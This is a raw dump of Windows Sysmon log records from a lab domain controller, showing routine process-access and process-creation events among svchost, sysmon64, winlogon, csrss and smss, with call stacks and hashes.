12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440693Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440692Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440691Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440690Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440689Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440688Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440687Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440686Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.906{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440685Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440684Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440683Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C228-00000000BA01}4304C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000440682Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000440681Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000440680Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.905{42DC5269-028A-6088-C128-00000000BA01}63645716C:\Windows\System32\smss.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000440679Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.900{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e73SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{42DC5269-028A-6088-C128-00000000BA01}6364C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 0000007c 10341000x8000000000000000440678Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.898{42DC5269-CE8E-6086-0200-00000000BA01}320948C:\Windows\System32\smss.exe{42DC5269-028A-6088-C228-00000000BA01}4304C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440677Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.897{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C228-00000000BA01}4304C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440676Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.890{42DC5269-CE99-6086-1400-00000000BA01}10522200C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440675Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440674Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440673Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440672Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440671Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440670Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440669Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 